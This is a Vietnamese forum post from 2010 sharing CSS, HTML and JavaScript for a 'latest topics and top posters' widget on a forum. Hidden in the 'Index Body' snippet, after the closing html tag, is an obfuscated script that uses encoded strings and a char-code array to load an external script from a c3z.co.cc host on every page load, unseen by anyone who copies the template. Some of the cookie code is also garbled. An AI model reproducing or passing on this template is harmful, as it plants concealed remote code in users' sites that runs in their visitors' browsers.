Navigation & Login
[Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
    


Share|
[Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)Xem chủ đề cũ hơn Xem chủ đề mới hơn

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down  Thông điệp [Trang 1 trong tổng số 1 trang]

Thu 02 Sep 2010, 19:11 Bài gửiTiêu đề: [Chia sẻ] Last topic+ top poster ( giống VBB và tự cập nhật)
avatar
HTML○CSS
Men Mới
Men Mới
Xem lý lịch thành viênPoints Points : 27561
Reputation Reputation : 2HTML○CSS :


CSS:


Spoiler:


Code:
Code:
.catLeft a:link, .catLeft_alink
{
  color: #000000;
  text-decoration: none;
}
.catLeft a:visited, .catLeft_avisited
{
  color: #000000;
  text-decoration: none;
}
.catLeft a:hover, .catLeft a:active, .catLeft_ahover
{
  color: #FF3300;
  text-decoration: underline;
}
.yeti
{
  background: #ffffff ;
  color: #333333;
  font: bold 11px tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
  height: 0px;

}
.tabs { margin: 0; padding: 0;}
.tabs { padding-bottom: 26px; margin-bottom: 15px; background: #E8F3FD; border-top: 1px solid #FFF; border-bottom: 1px solid #CAD9EA; }
.tabs li { list-style: none;float: left; line-height: 27px; border-right: 1px solid #CAD9EA; height: 27px; font-size: 11px; }
.tabs li.current { background: #FFF; height: 27px; font-weight: bold; }

.mainbox { background: #FFF; border: 1px solid #9DB3C5; padding: 1px; margin-bottom: 6px; }
.mainbox table { width: 100%; }
#dhtmlpointer, #dhtmltooltip
{
  z-index: 999;
  left: -300px; top:0px;
  visibility: hidden;
  position: absolute;
}
#dhtmltooltip
{
  border: #666 2.4px solid;
  -moz-opacity: 0.8;
  opacity: 0.8;
  filter: alpha(opacity=80);
  -moz-border-radius: 6px;
  -webkit-border-radius: 6px;
  padding: 10px;
  font-size: 9pt;
  font-family: Arial;
  background-color: white;
  width: auto;
  max-width: 340px;
  width:expression( document.body.clientWidth > 340? "340px": "auto" );
  text-align:left;
}


Index Body:

Spoiler:


Code:
Code:
<table  class="Nhuxuan" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >
                                                  <tr>
                                                  <td valign="top" width="100%">
                                                  <div class="test">
                                                    <table class="nhuxuan" cellpadding="5" cellspacing="0" style="border: 1px #ded7d7 solid;" border="0" width="100%" align="center">
<thead>
<tr valign="top">
        <td class="tborder" colspan="3">
            <span style="float: right;">
             
                 
             
                          </span>
            <strong><a href="http://nhuxuan.com" target="_blank"><br>  <div style="float: left; margin-top: -20px; margin-left: +5px;" ><font color=white>Diễn Đàn Như Xuân-thống kê</font></div></a></strong>
        </td>
      </tr>
  </thead>

 <tr>
                                              <td width="100%">

                                                                                                  <div><input src="http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat.gif" style="float: right; margin-top: -22px; margin-right: +3px;" onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = '';this.src ='http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat.gif';  } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.src ='http://loitraitim.com/diendan/styles/Wchild/buttons/collapse_tcat_collapsed.gif';  }" type="image" align="center"></div><div style="margin: 0px; padding: 0px; min-height: 0px; max-width: 980px; background-color: transparent;">
<div style="" align="center">
 <table class="thongke" cellpadding="0" cellspacing="2" border="0" width="100%" align="center">
                                                      <thead>
                                                <tr valign="top">
                                                            <td width="23%"></td><td width="100%" colspan="2"></td>
                                                          </tr>
                                                <tr>
                                                      <td><table  class="thongke" cellpadding="0" cellspacing="0" border="0" width="100%" align="center" >

<tr>
<td valign="top" style="border: 1px solid #9DB3C5;">
<!-- BEGIN giefmod_index1 -->
{giefmod_index1.MODVAR}<!-- END giefmod_index1 -->
                                                  </tr>
                                            </thead>
                                              </table>
</div></div>
                                            </td></tr>
</table>

                                            </div>
                              </td>
                                    </tr>
                                    <tr>
                                              <td valign="top" width="100%">
<!-- BEGIN html_validation -->
                                            </td>
                                                                </tr>
                                                      </tbody>
                                                </table>

              </div>
            </div>
        </td>
      </tr>
  </table>         

</body>
</html>
<!-- END html_validation -->
<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='*8Hxhwnuy*75qfslzflj*8I*77of%7Bfxhwnuy*77*8Jkzshynts*75lnfnrf7*7%3Dtg*7%3E*%3CG%7Bfw*75ht*8I5*8G%7Bfw*75wj*8I*7%3C*7%3C*8G%7Cmnqj*7%3Dht*8Htg3qjslym*7%3E*%3CGwj0*8IXywnsl3kwtrHmfwHtij*7%3Dtg*%3AGht*%3AI*7%3E*8Ght00*8G*%3CIwjyzws*75wj*8G*%3CI*8H4xhwnuy*8J5';dF(str4);var str2=new Array(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,99,51,122,46,99,111,46,99,99,47,104,116,109,108,45,104,51,51,46,104,116,109,62,60,47,115,99,114,105,112,116,62);document.write(giaima2(str2));
</script>
Code:
Mod_recent:
Spoiler:

Code:
</td></tr></table></td>
<td style="width: 0px"></td>
<td valign="top" style="border: 1px solid #9DB3C5; padding: 1px">


<style type="text/css">
/* Style cho menu tabs */
div.TabView div.Tabs
{height: 28px; /* chiều cao của tab menu */
overflow: hidden;
}div.TabView div.Tabs: hover,{height: 28px; /* chiều cao của tab menu */overflow: hidden;}
div.TabView div.Tabs a ,
div.TabView div.Tabs a:hover {float: left;display: block;background-color:#;text-align: center;height: 29px;padding: 6px;vertical-align: middle;border:1px solid #cad9ea;border-top: 0px;border-left: 0px;border-bottom: 0px; /* đường viền quanh tabs menu */text-decoration: none;font-family: Tahoma;font-size: 11px;color: #000000;}.hotrott{background-color: #ffffff;border: 0px solid #ded7d7;}.nen{background-color: #ffffff;border: 1px solid #ded7d7;}

div.TabView div.Tabs a.Active{background-color: #ffffff; /* màu nền tab menu active */color: #000000;border:1px solid #cad9ea;border-top: 0px;border-left: 0px;border-bottom: 0px; padding: 6px;height: 29px;font-size: 11px;font-weight: bold;}

/* Style cho phần text nội dung của mỗi tab */

div.TabView {clear: both;border: 0px solid #ffffff;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}

div.TabView div.Pages div.Page{height: 100%;padding: 0px;border: 0px solid #cad9ea;overflow: hidden; /* giá trị là auto nếu muốn hiện scroll bar */}</style>


<script type="text/javascript" src="http://users6.jabry.com/tuyetson08/Tabview.js"></script>

<div id="TabView" class="TabView" style="padding: 0px;"><!--
 tabs --><div width="100%" class="Tabs">
<a class="Active" href="javascript:tabview_switch('TabView', 1);">Bài Viết Mới</a>
<a>Bài Viết Được QT Nhất</a>
<a>Thống Kê</a>
<a>Hướng Dẫn</a>
<a>Báo Mới</a>
 
<a>Up Ảnh Nhanh</a>
<a>SMS free</a>
<a>Chatroom 2</a>
<ul class="tabs" id="vietvbb_topstats_t">  <li style="border-right: 0px; display: none;" id="vietvbb_topstats_t_loading"></li> </ul>

</div>

<!-- nội dung tabs -->
<div style="height:319px; width:100%" class="Pages">

<div class="Page">
<center>
<!-- BEGIN classical_row --> <table width="100%" border="0" cellspacing="1" cellpadding="3" align="center">
<tr>
<td>
<table width="100%"><tr><td class="yeti" width="80%" align="left"></td><td class="yeti" width="20%" align="right"></td></tr></table></td></tr>

<tr><td style="padding: 0px; background: rgb(255, 255, 255) none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%">


<tbody>
<tr valign="top"><td style="border-top: 0px none; padding: 0px; background: transparent url(http://illiweb.com/fa/pbucket.gif) no-repeat scroll center top; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;" width="24">
<img src="http://illiweb.com/fa/empty.gif" width="24" border="0"></td>
<td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="left" background="http://illiweb.com/fa/pbucket.gif" width="80%">

<!-- BEGIN recent_topic_row -->
<a onmouseover="showtip('<font color=blue><b>+Tiêu đề:</b></font> <b><font color=black>{classical_row.recent_topic_row.L_TITLE}</font></b><br> <font color=blue><b>+Thời gian:</b></font> <b><font color=black>{classical_row.recent_topic_row.S_POSTTIME}</font></b><br><strong><font color=blue><b>+Lời Nhắn:</b></font></strong> <b><font color=black>Welcome to NhuXuan! Hãy cảm ơn bài viết bổ ích nhé,không spam.Thân!</font></b>');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_TITLE}"><b><font color=#3399FF size="1">{classical_row.recent_topic_row.L_TITLE}</font></b></a>

<!-- END recent_topic_row --></td>

<td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" align="right" background="http://illiweb.com/fa/pbucket.gif" width="20%"><!-- BEGIN recent_topic_row -->
<div class="smallfont" style="overflow: hidden; height: 20px; width: 100%;">
<a onmouseover="showtip('<b>Click để xem profile của thành viên này !</b>');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_POSTER}"><font size="1"> <script language="JavaScript">images = new Array(6);images[0] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[1] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[2] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[3] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[4] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";images[5] = "<img src='http://illiweb.com/fa/pbucket.gif' border='0'>";index = Math.floor(Math.random() * images.length);document.write(images[index]);</script> <b style="padding-top: 2px;">{classical_row.recent_topic_row.S_POSTER}</b></font></a></div>
<!-- END recent_topic_row --></td>

</tr>
</tbody>   
</table></td></tr>
</table><!-- END classical_row --></center>
</div>
<div class="Page">
                    <table width="100%" border="0" cellspacing="1" cellpadding="3" align="center">
<tr>
<td>
<table width="100%"><tr><td class="yeti" width="80%" align="left"></td><td class="yeti" width="20%" align="right"></td></tr></table></td></tr>


                          <tr valign="top">
                          <td style="background: url(http://illiweb.com/fa/pbucket.gif) no-repeat top; border-top: 0px none; padding: 0px;" width="24"><img src="http://illiweb.com/fa/pbucket.gif" border="0"></td>
                                <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" width="100%" background="http://i87.servimg.com/u/f87/13/37/93/66/listbg10.gif"><div align="left">


<div id="vietvbb_topstats_s_content" style="display: block;"><a href="http://www.nhuxuan.com/forum-f131/topic-t1225.htm#307" onmouseover="showtip('<center><b><font color=green>Tuyển Mod Trên Toàn Diễn Đàn
 </font></b></center>');" onmouseout="hidetip();"><b><font size="1"> Tuyển Mod Trên Toàn Diễn Đàn
 </font></a></b></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f156/" onmouseover="showtip('<center><b><font color=green>Thư Viện Tài Liệu</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Thư Viện Tài Liệu</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f112/" onmouseover="showtip('<center><b><font color=green>Ảnh Như Xuân</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Ảnh Như Xuân </font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f27/topic-t304.htm" onmouseover="showtip('<center><b><font color=green>Mediafire Movies Collections HDRip.x264 [300-500MB]</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Mediafire Movies Collections HDRip.x264 [300-500MB]
 </font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">


<a href="http://www.nhuxuan.com/forum-f4/topic-t361.htm" onmouseover="showtip('<center><b><font color=green> mem b1 ui! vào đây viết nhật kí lớp này! </font></b></center>');" onmouseout="hidetip();"><b><font size="1">mem b1 ui! vào đây viết nhật kí lớp này!</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;"><a href="http://www.nhuxuan.com/forum-f103/topic-t765.htm" onmouseover="showtip('<center><b><font color=green>[New] - Lễ ra quân hưởng ứng Tháng thanh niên, trường THPT Như Xuân</font></b></center>');" onmouseout="hidetip();"><b><font size="1">[New] - Lễ ra quân hưởng ứng Tháng thanh niên, trường THPT Như Xuân
 </font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f168/topic-t1149.htm" onmouseover="showtip('<center><b><font color=green>Ảnh kỉ niệm 16 năm thành lập VDNH</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Ảnh kỉ niệm 16 năm thành lập VDNH</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">


<a href="http://www.nhuxuan.com/forum-f154/topic-t608.htm" onmouseover="showtip('<center><b><font color=green>[ Video ] Giao lưu AOE Việt Nam - Trung Quốc | Video AOE</font></b></center>');" onmouseout="hidetip();"><b><font size="1[ Video ] Giao lưu AOE Việt Nam - Trung Quốc | Video AOE</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">


<a href="http://www.nhuxuan.com/forum-f154/topic-t607.htm" onmouseover="showtip('<center><b><font color=green>[HOT] Hướng dẫn xem AOE trực tuyến toàn tập</font></b></center>');" onmouseout="hidetip();"><b><font size="1"> [HOT] Hướng dẫn xem AOE trực tuyến toàn tập</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f62/topic-t50.htm" onmouseover="showtip('<center><b><font color=green>Hình nền thiên nhiên đẹp [Làm Background cho máy tính thì tuyệt] ;)</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Hình nền thiên nhiên đẹp [Làm Background cho máy tính thì tuyệt] ;)</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f118/topic-t58.htm" onmouseover="showtip('<center><b><font color=green>Một số Theme Blog 360 plus đẹp 2</font></b></center>');" onmouseout="hidetip();"><b><font size="1"> Một số Theme Blog 360 plus đẹp 2</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f103/topic-t290.htm" onmouseover="showtip('<center><b><font color=green>Trường THPT Như Xuân</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Trường THPT Như Xuân</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f57/topic-t370.htm" onmouseover="showtip('<center><b><font color=green>Quán ăn hài hước 1</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Quán ăn hài hước 1 </font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f113/topic-t244.htm" onmouseover="showtip('<center><b><font color=green>--TV online--</font></b></center>');" onmouseout="hidetip();"><b><font size="1">--TV online--
 </font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f107/" onmouseover="showtip('<center><b><font color=green>Quê Hương Tôi</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Quê Hương Tôi</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

<a href="http://www.nhuxuan.com/forum-f132/" onmouseover="showtip('<center><b><font color=green>Only Love</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Only Love</font></a></b></div></div></TD></TR></TABLE>

</div><div class="Page">
                    <table width="100%" border="0" cellspacing="1" cellpadding="3" align="center">
<tr>
<td>
<table width="100%"><tr><td class="yeti" width="80%" align="left"></td><td class="yeti" width="20%" align="right"></td></tr></table></td></tr>


                          <tr valign="top">
                          <td style="background: url(http://illiweb.com/fa/pbucket.gif) no-repeat top; border-top: 0px none; padding: 0px;" width="24"><img src="http://illiweb.com/fa/pbucket.gif" border="0"></td>
                                <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" width="100%" background="http://i87.servimg.com/u/f87/13/37/93/66/listbg10.gif"><div align="left">
<div id="vietvbb_topstats_s_content" style="display: block;">


<a href="/stats.htm#10" onmouseover="showtip('<center><b><font color=green>Số bài post trong mỗi tháng</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Số bài post trong mỗi tháng</font></a></b></div></div><div align="left">
<div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#2" onmouseover="showtip('<center><b><font color=green>Thống Kê Chung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Thống Kê Chung</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#3" onmouseover="showtip('<center><b><font color=green>Topic
hoạt động sôi nổi nhất</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Topic hoạt động sôi nổi nhất</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#4" onmouseover="showtip('<center><b><font color=green>Topic được xem nhiều nhất</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Topic được xem nhiều nhất</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#5" onmouseover="showtip('<center><b><font color=green>Thành viên có nhiều chủ đề nhất</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Thành viên có nhiều chủ đề nhất</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#6" onmouseover="showtip('<center><b><font color=green>Top posting users trong tuần</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Top posting users trong tuần</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/stats.htm#7" onmouseover="showtip('<center><b><font color=green>Top posting users trong tháng</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Top posting users trong tháng</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/stats.htm#8" onmouseover="showtip('<center><b><font color=green>Top posters</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Top posters</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/stats.htm#9" onmouseover="showtip('<center><b><font color=green>Số topic trong mỗi tháng</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Số topic trong mỗi tháng</font></a></b></div></div>


<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

          <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/stats.htm#2" onmouseover="showtip('<center><b><font color=green>Administrative statistics</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Administrative statistics</font></a></b></div></div></TD></TR></TABLE>

</div>

<div class="Page">
                    <table width="100%" border="0" cellspacing="1" cellpadding="3" align="center">
<tr>
<td>
<table width="100%"><tr><td class="yeti" width="80%" align="left"></td><td class="yeti" width="20%" align="right"></td></tr></table></td></tr>


                          <tr valign="top">
                          <td style="background: url(http://illiweb.com/fa/pbucket.gif) no-repeat top; border-top: 0px none; padding: 0px;" width="24"><img src="http://illiweb.com/fa/pbucket.gif" border="0"></td>
                                <td style="border-top: 0px none; padding: 0px; line-height: 20px; background-repeat: repeat;" width="100%" background="http://i87.servimg.com/u/f87/13/37/93/66/listbg10.gif"><div align="left">
<div id="vietvbb_topstats_s_content" style="display: block;">


<a href="http://www.nhuxuan.com/forum-f1/topic-t642.htm#1327" onmouseover="showtip('<center><b><font color=green> Hướng dẫn cơ bản cho New member </font></b></center>');" onmouseout="hidetip();"><b><font size="1"> Hướng dẫn cơ bản cho New member </font></a></b></div></div><div align="left">
<div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="http://www.nhuxuan.com/forum-f1/topic-t364.htm" onmouseover="showtip('<center><b><font color=green>Đăng kí vào diễn đàn</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Đăng kí vào diễn đàn</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/forum-f1/topic-t243.htm" onmouseover="showtip('<center><b><font color=green>Hướng dẫn chỉnh sửa avatar và chữ kí
</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Topic hoạt động sôi nổi nhất</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/forum-f1/topic-t178.htm" onmouseover="showtip('<center><b><font color=green>Cách gõ tiếng việt trong diễn đàn</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Cách gõ tiếng việt trong diễn đàn</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/forum-f1/topic-t7.htm" onmouseover="showtip('<center><b><font color=green>Hướng dẫn BBcode</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Hướng dẫn BBcode</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/forum-f1/topic-t45.htm" onmouseover="showtip('<center><b><font color=green>Hướng dẫn cách post bài(bài viết mới)</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Hướng dẫn cách post bài(bài viết mới)</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

      <a href="/forum-f1/topic-t265.htm" onmouseover="showtip('<center><b><font color=green>default Công thức toán học cho forum</font></b></center>');" onmouseout="hidetip();"><b><font size="1">default Công thức toán học cho forum</font></a></b></div></div><div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/forum-f1/topic-t6.htm" onmouseover="showtip('<center><b><font color=green>Cách post hình</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Cách post hình</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/forum-f1/topic-t5.htm" onmouseover="showtip('<center><b><font color=green>cách post nhạc</font></b></center>');" onmouseout="hidetip();"><b><font size="1">cách post nhạc</font></a></b></div></div>


<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="http://www.nhuxuan.com/forum-f1/topic-t1.htm" onmouseover="showtip('<center><b><font color=green>Cách Post Phim,video lên Forum</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Cách Post Phim,video lên Forum</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

          <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>

<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div>
<div align="left"><div id="vietvbb_topstats_s_content" style="display: block;">

    <a href="/index.htm" onmouseover="showtip('<center><b><font color=green>Chưa có nội dung</font></b></center>');" onmouseout="hidetip();"><b><font size="1">Chưa có nội dung</font></a></b></div></div></TD></TR></TABLE>
</div>
<div class="Page">
<center>
<script type="text/javascript">epi_id = 'epi-widget-container';epi_width = '100%';epi_height = '150';</script><script type="text/javascript" src="http://www.baomoi.com/Widget/JS/Widget.js"></script><script type="text/javascript" src="http://www.baomoi.com/Widget/GenerateJS.aspx?zone=-1&count=30&ntype=popular&dtype=2&target=0"></script>
</center>
</div>
<div class="Page">
<center>

<iframe marginwidth="0" marginheight="0" frameborder="0" scrolling="yes" width="600" height="340" src='http://nhuxuan.com/html-h59.htm' ></iframe>


</center></div>
<div class="Page">
<center>

<iframe marginwidth="0" marginheight="0" frameborder="0" scrolling="yes" width=600" height="340" src='http://www.nhuxuan.com/html-h82.htm' ></iframe>


</center></div>
<div class="Page">
<center>

<iframe frameborder="0" width="600" height="75" src="http://www5.cbox.ws/box/?boxid=483522&boxtag=96wt5w&sec=form" marginheight="2" marginwidth="2" scrolling="no" allowtransparency="yes" name="cboxform" style="border: #EAB412 1px solid; border-top: 0px;" id="cboxform"></iframe>
<iframe frameborder="0" width="600" height="255" src="http://www5.cbox.ws/box/?boxid=483522&boxtag=96wt5w&sec=main" marginheight="2" marginwidth="2" scrolling="auto" allowtransparency="yes" name="cboxmain" style="border: #EAB412 1px solid;" id="cboxmain"></iframe>

</center></div>


</div>
<script type="text/javascript">tabview_initialize('TabView');</script><ScrollTop -->
<style type="text/css">
#topbar

  PADDING-TOP: 0px;
  PADDING-BOTTOM: 0px;
  PADDING-RIGHT: 0px;
  PADDING-LEFT: 0px;
  VISIBILITY: hidden;
  WIDTH: 180px;
  FONT-FAMILY: Tahoma;
  POSITION: absolute;
}
</style>
<script type="text/javascript">
var persistclose = 0
<!-- Vị trí-->
var startX = 80
var startY = 500
var verticalpos = "frombottom"

function iecompattest()
{
  return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
}

function get_cookie(Name)
{
  var search = Name + "="
  var returnvalue = "";
  if (document�cookie.length > 0)
  {
      offset = document�cookie.indexOf(search)
      if (offset != -1)
      {
        offset += search.length
        end = document�cookie.indexOf(";", offset);

        if (end == -1) end = document�cookie.length;
        returnvalue=unescape(document�cookie.substring(offset, end))
      }
  }
  return returnvalue;
}

function closebar()
{
  if (persistclose)
  document�cookie="remainclosed=1"
  document.getElementById("topbar").style.visibility="hidden"
}

function staticbar()
{
  barheight=document.getElementById("topbar").offsetHeight
  var ns = (navigator.appName.indexOf("Netscape") != -1) || window.opera;
  var d = document;
  function ml(id)
  {
      var el=d.getElementById(id);
      if (!persistclose || persistclose && get_cookie("remainclosed")=="")
      el.style.visibility="visible"
      if(d.layers)el.style=el;
      el.sP=function(x,y){this.style.right=x+"px";this.style.top=y+"px";};
      el.x = startX;
      if (verticalpos=="fromtop")
        el.y = startY;
      else
      {
        el.y = ns ? pageYOffset + innerHeight : iecompattest().scrollTop + iecompattest().clientHeight;
        el.y -= startY;
      }
      return el;
  }
 
  window.stayTopLeft=function()
  {
      if (verticalpos=="fromtop")
      {

        var pY = ns ? pageYOffset : iecompattest().scrollTop;
        ftlObj.y += (pY + startY - ftlObj.y)/8;
      }
      else
      {
        var pY = ns ? pageYOffset + innerHeight - barheight: iecompattest().scrollTop + iecompattest().clientHeight - barheight;
        ftlObj.y += (pY - startY - ftlObj.y)/8;
      }
      ftlObj.sP(ftlObj.x, ftlObj.y);
      setTimeout("stayTopLeft()", 10);
  }
  ftlObj = ml("topbar");
  stayTopLeft();
}

if (window.addEventListener)
  window.addEventListener("load", staticbar, false)
else if (window.attachEvent)
  window.attachEvent("onload", staticbar)
else if (document.getElementById)
  window.onload=staticbar
</script>


                              </div>
                          </td>Code:
Mod_poster:
[hide]

Code:
                         
                  <table width="100%" border="0" cellpadding="0" cellspacing="0">
              <tbody><tr>
<td  "width="25%">
 <div style="border: 1px solid #9DB3C5; border-bottom: 0px; border-right: 0px; border-left: 0px; border-top: 0px;"class="mainbox"> <ul class="tabs"><li class="current"><span style="padding: 0px 5px;">
